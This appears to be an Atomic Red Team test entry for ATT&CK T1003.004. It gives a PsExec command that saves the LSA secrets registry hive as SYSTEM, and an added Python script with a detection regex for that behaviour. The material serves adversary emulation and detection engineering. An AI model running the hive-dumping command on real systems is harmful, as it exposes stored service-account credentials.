T1003.004
OS Credential Dumping: LSA Secrets
Description from ATT&CK
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
Reg can be used to extract from the Registry. Mimikatz can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
Atomic Tests
Atomic Test #1 - Dumping LSA Secrets
Dump the secrets key from the Windows registry. When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
Supported Platforms: windows
auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
psexec_exe | Path to PsExec executable | path | PathToAtomicsFolder\T1003.004\bin\PsExec.exe |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
Cleanup Commands:
del %temp%\secrets >nul 2> nul
Dependencies: Run with powershell!
Description: PsExec from Sysinternals must exist on disk at the specified location (#{psexec_exe})
Check Prereq Commands:
if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
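The attack command in Atomic Test #1 leaves a clear trace in process-creation telemetry: reg.exe saving the HKLM\SECURITY\Policy\Secrets hive, spawned from the PsExec service stub when -s is used. The following detection logic is an added example (not part of the Atomic Red Team test or ATT&CK text) that runs over constructed Sysmon Event ID 1 / Security 4688-style records; the field layout and the PSEXESVC.exe parent name are assumptions about how such records look.

```python
import re
from typing import Optional

# Constructed sample process-creation records, not real telemetry.
# Each entry: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\PSEXESVC.exe", "C:\\Windows\\System32\\reg.exe",
     "reg save HKLM\\security\\policy\\secrets C:\\Users\\bob\\AppData\\Local\\Temp\\secrets /y"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\reg.exe",
     "reg  SAVE  HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets  c:\\temp\\s.hiv"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\reg.exe",
     "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\reg.exe",
     "reg save HKLM\\SOFTWARE C:\\backup\\software.hiv"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe", "notepad.exe"),
]

# reg.exe sub-commands that write an offline copy of a hive (save / export) targeting
# the LSA secrets key. Accept either hive spelling, an optional quoted full path to
# reg.exe, repeated whitespace and mixed case, since attackers vary all of these.
SECRETS_KEY_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+(save|export)\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\SECURITY\\Policy\\Secrets\b',
    re.IGNORECASE,
)


def classify(parent: str, image: str, cmdline: str) -> Optional[str]:
    """Return a finding label for one process-creation event, or None if benign."""
    if not image.lower().endswith("\\reg.exe"):
        return None
    m = SECRETS_KEY_RE.search(cmdline)
    if not m:
        return None
    # PsExec -s launches the child from its service stub (assumed name PSEXESVC.exe),
    # which is how the atomic test obtains SYSTEM; record the launch path for the analyst.
    via_psexec = parent.lower().endswith("\\psexesvc.exe")
    label = f"T1003.004 LSA secrets hive {m.group(1).lower()}"
    return label + (" via PsExec -s" if via_psexec else "")


def scan(events):
    """Run classify over (parent, image, cmdline) tuples and return the hits."""
    return [(cmd, label) for parent, image, cmd in events
            if (label := classify(parent, image, cmd))]
```

Only two of the five sample records are flagged: the other reg.exe invocations touch unrelated keys and are not matched, which keeps routine registry backups out of the alert stream.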